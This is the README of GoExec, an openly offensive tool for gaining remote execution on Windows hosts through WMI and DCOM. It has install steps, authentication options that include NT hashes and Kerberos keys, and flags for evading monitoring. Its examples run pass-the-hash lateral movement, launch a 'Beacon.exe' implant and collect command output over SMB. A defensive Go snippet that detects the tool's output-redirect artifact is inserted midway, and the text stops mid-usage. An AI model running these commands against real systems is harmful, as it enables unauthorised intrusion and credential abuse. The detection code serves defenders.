# GoExec - Remote Execution Multitool

GoExec is a new take on some of the methods used to gain remote execution on Windows devices. GoExec implements a number of largely unrealized execution methods and provides significant OPSEC improvements overall.

The original post about GoExec v0.1.0 can be found here.
## Installation

### Build & Install with Go

To build this project from source, you will need Go version 1.23.* or greater and a 64-bit target architecture. More information on managing Go installations can be found here.

```shell
# Install goexec (release)
go install -ldflags="-s -w" -trimpath "github.com/FalconOpsLLC/goexec@latest"
```
### Manual Installation

For pre-release features, fetch the latest commit and build manually.

```shell
# Install goexec (development)
go install -ldflags="-s -w" -trimpath "github.com/FalconOpsLLC/goexec@main"
```
### Install with Docker

We've provided a Dockerfile to build and run GoExec within Docker containers.

```shell
# (Linux) Install GoExec Docker image

# Fetch source
git clone https://github.com/FalconOpsLLC/goexec
cd goexec

# Build goexec image; must be root or a docker group member.
docker build . --tag goexec

# Run goexec via Docker container
alias goexec='sudo docker run -it --rm goexec'
goexec -h # display help menu
```
### Install from Release

You may also download the latest release for 64-bit Windows, macOS, or Linux.
## Usage

GoExec is made up of modules for each remote service used (e.g. wmi, scmr) and specific methods within each module (e.g. wmi proc, scmr change).

```text
Usage:
  goexec [command] [flags]

Execution Commands:
  dcom        Execute with Distributed Component Object Model (MS-DCOM)
  wmi         Execute with Windows Management Instrumentation (MS-WMI)
  scmr        Execute with Service Control Manager Remote (MS-SCMR)
  tsch        Execute with Windows Task Scheduler (MS-TSCH)

Additional Commands:
  help        Help about any command
  completion  Generate the autocompletion script for the specified shell

Logging:
  -D, --debug           Enable debug logging
  -O, --log-file file   Write JSON logging output to file
  -j, --json            Write logging output in JSON lines
  -q, --quiet           Disable info logging

Authentication:
  -u, --user user@domain   Username ('user@domain', 'domain\user', 'domain/user' or 'user')
  -p, --password string    Password
  -H, --nt-hash hash       NT hash ('NT', ':NT' or 'LM:NT')
      --aes-key hex key    Kerberos AES hex key
      --pfx file           Client certificate and private key as PFX file
      --pfx-password string  Password for PFX file
      --ccache file        Kerberos CCache file name (defaults to $KRB5CCNAME, currently unset)
      --dc string          Domain controller
  -k, --kerberos           Use Kerberos authentication
```
### Fetching Remote Process Output

Although not recommended for live engagements or monitored environments due to OPSEC concerns, we've included the optional ability to fetch program output via SMB file transfer with the `-o`/`--out` flag.

Use of this flag wraps the supplied command in `cmd.exe /c ... >\Windows\Temp\RANDOM`, where `RANDOM` is a random GUID, then fetches the output file via SMB file transfer.

By default, the output collection times out after 1 minute, but this can be adjusted with the `--out-timeout` flag.
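From the defender's side, the output-collection wrapper described above leaves a recognisable process-creation artifact: a `cmd.exe /c` child whose command line redirects into a GUID-named file under `\Windows\Temp`. The following Go program is an added example (not part of the GoExec project) that classifies constructed Sysmon-style process events on that pattern; the exact GUID file-name form and the per-module parent images (WmiPrvSE.exe, mmc.exe, services.exe, svchost.exe) are assumptions, not something this README states.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// ProcEvent is a minimal process-creation record (Sysmon Event ID 1 fields).
type ProcEvent struct {
	Image, ParentImage, CommandLine string
}

// -o/--out wraps the command as `cmd.exe /c ... >\Windows\Temp\<GUID>` (braces/case assumed).
var outRedirect = regexp.MustCompile(
	`(?i)>\s*(?:[a-z]:)?\\Windows\\Temp\\\{?[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}?`)

// Hosts that parent each module's child process (assumption: standard WMI/MMC/SCM/TSCH hosts).
var remoteExecParents = map[string]string{
	"wmiprvse.exe": "wmi", "mmc.exe": "dcom mmc",
	"services.exe": "scmr", "svchost.exe": "tsch",
}

// baseName returns the lower-cased file name of a Windows or POSIX path.
func baseName(p string) string {
	return strings.ToLower(p[strings.LastIndexAny(p, `\/`)+1:])
}

// Classify returns "" for non-matching events, otherwise a short reason that
// attributes the redirect to a module when the parent is that module's host.
func Classify(e ProcEvent) string {
	if baseName(e.Image) != "cmd.exe" || !outRedirect.MatchString(e.CommandLine) {
		return ""
	}
	if module, ok := remoteExecParents[baseName(e.ParentImage)]; ok {
		return "output collection via goexec " + module
	}
	return "GUID-named redirect into Windows\\Temp (parent " + baseName(e.ParentImage) + ")"
}

func main() {
	// Constructed sample events; the first mimics `goexec wmi proc ... -o-`.
	for _, e := range []ProcEvent{
		{`C:\Windows\System32\cmd.exe`, `C:\Windows\System32\wbem\WmiPrvSE.exe`,
			`cmd.exe /c whoami /all >\Windows\Temp\3f2504e0-4f89-11d3-9a0c-0305e82c3301`},
		{`C:\Windows\System32\cmd.exe`, `C:\Windows\explorer.exe`, `cmd.exe /c whoami /all`},
	} {
		fmt.Printf("%q -> %q\n", e.CommandLine, Classify(e))
	}
}
```

The match on the parent image only adds attribution; the redirect into a GUID-named `\Windows\Temp` file is the signal worth alerting on regardless of parent.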
## WMI Module (wmi)

The wmi module uses remote Windows Management Instrumentation (WMI) to spawn processes (`wmi proc`), or manually call a method (`wmi call`).

```text
Usage:
  goexec wmi [command] [flags]

Available Commands:
  proc        Start a Windows process
  call        Execute specified WMI method

... [inherited flags] ...

Network:
  -x, --proxy URI           Proxy URI
  -F, --epm-filter string   String binding to filter endpoints returned by the RPC endpoint mapper (EPM)
      --endpoint string     Explicit RPC endpoint definition
      --epm                 Use EPM to discover available bindings
      --no-sign             Disable signing on DCERPC messages
      --no-seal             Disable packet stub encryption on DCERPC messages
```
### Process Creation Method (wmi proc)

The proc method creates an instance of the `Win32_Process` WMI class, then calls the `Create` method to spawn a process with the provided arguments.

```text
Usage:
  goexec wmi proc [target] [flags]

Execution:
  -e, --exec string        Remote Windows executable to invoke
  -a, --args string        Process command line arguments
  -c, --command string     Windows process command line (executable & arguments)
  -o, --out string         Fetch execution output to file or "-" for standard output
  -m, --out-method string  Method to fetch execution output (default "smb")
      --no-delete-out      Preserve output file on remote filesystem
  -d, --directory string   Working directory (default "C:\\")

... [inherited flags] ...
```
#### Examples

```shell
# Run an executable without arguments
goexec wmi proc "$target" \
  -u "$auth_user" \
  -p "$auth_pass" \
  -e 'C:\Windows\Temp\Beacon.exe'

# Authenticate with NT hash, fetch output from `cmd.exe /c whoami /all`
goexec wmi proc "$target" \
  -u "$auth_user" \
  -H "$auth_nt" \
  -e 'cmd.exe' \
  -a '/C whoami /all' \
  -o- # Fetch output to STDOUT
```
### (Auxiliary) Call Method (wmi call)

The call method gives the operator full control over a WMI method call. You can list available classes and methods on Windows with PowerShell's `Get-CimClass`.

```text
Usage:
  goexec wmi call [target] [flags]

WMI:
  -n, --namespace string   WMI namespace (default "//./root/cimv2")
  -C, --class string       WMI class to instantiate (e.g. "Win32_Process")
  -m, --method string      WMI method to call (e.g. "Create")
  -A, --args string        WMI method argument(s) in JSON dictionary format (e.g. {"Command":"calc.exe"}) (default "{}")

... [inherited flags] ...
```
#### Examples

```shell
# Call StdRegProv.EnumKey - enumerate registry subkeys of HKLM\SYSTEM
goexec wmi call "$target" \
  -u "$auth_user" \
  -p "$auth_pass" \
  -C 'StdRegProv' \
  -m 'EnumKey' \
  -A '{"sSubKeyName":"SYSTEM"}'
```
## DCOM Module (dcom)

The dcom module uses exposed Distributed Component Object Model (DCOM) objects to gain remote execution.

> [!WARNING]
> The DCOM module is generally less reliable than other modules because the underlying methods are often reliant on the target Windows version and specific Windows settings. Additionally, Kerberos auth is not officially supported by the DCOM module, but kudos if you can get it to work.

```text
Usage:
  goexec dcom [command] [flags]

Available Commands:
  mmc                 Execute with the MMC20.Application DCOM object
  shellwindows        Execute with the ShellWindows DCOM object
  shellbrowserwindow  Execute with the ShellBrowserWindow DCOM object
  htafile             Execute with the HTAFile DCOM object
  excel               Execute with DCOM object(s) targeting Microsoft Excel
  visualstudio        Execute with DCOM object(s) targeting Microsoft Visual Studio

... [inherited flags] ...

Network:
  -x, --proxy URI            Proxy URI
  -F, --epm-filter binding   String binding to filter endpoints returned by the RPC endpoint mapper (EPM)
      --endpoint binding     Explicit RPC endpoint string binding
      --epm                  Use EPM to discover available bindings
      --no-sign              Disable signing on DCERPC messages
      --no-seal              Disable packet stub encryption on DCERPC messages
```
### MMC20.Application Method (dcom mmc)

The mmc method instantiates a remote `MMC20.Application` object to call `Document.ActiveView.ShellExec`, and ultimately spawn a process on the remote host.

```text
Usage:
  goexec dcom mmc [target] [flags]

Execution:
  -e, --exec string         Remote Windows executable to invoke
  -a, --args string         Process command line arguments
  -c, --command string      Windows process command line (executable & arguments)
  -o, --out file            Fetch execution output to file or "-" for standard output
  -m, --out-method Method   Method to fetch execution output (default "smb")
      --out-timeout duration  Output timeout duration (default 1m0s)
      --no-delete-out       Preserve output file on remote filesystem
      --directory directory Working directory (default "C:\\")
      --window string       Window state (default "Minimized")

... [inherited flags] ...
```
#### Examples

```shell
# Authenticate with NT hash, fetch output from `cmd.exe /c whoami /priv` to file
goexec dcom mmc "$target" \
  -u "$auth_user" \
  -H "$auth_nt" \
  -e 'cmd.exe' \
  -a '/c whoami /priv' \
  -o ./privs.bin # Save output to ./privs.bin
```
### ShellWindows Method (dcom shellwindows)

The shellwindows method uses a `ShellWindows` DCOM object to call `Item().Document.Application.ShellExecute` and spawn a remote process. This execution method isn't nearly as stable as the `dcom mmc` method for a few reasons:

- This method may not work on the latest Windows versions.
- It may require that there is an active desktop session on the target machine.
- Successful execution may be on behalf of the desktop user, not necessarily an administrator.

```text
Usage:
  goexec dcom shellwindows [target] [flags]

Execution:
  -e, --exec executable   Remote Windows executable to invoke
  -a, --args string       Process command line arguments
  -c,
```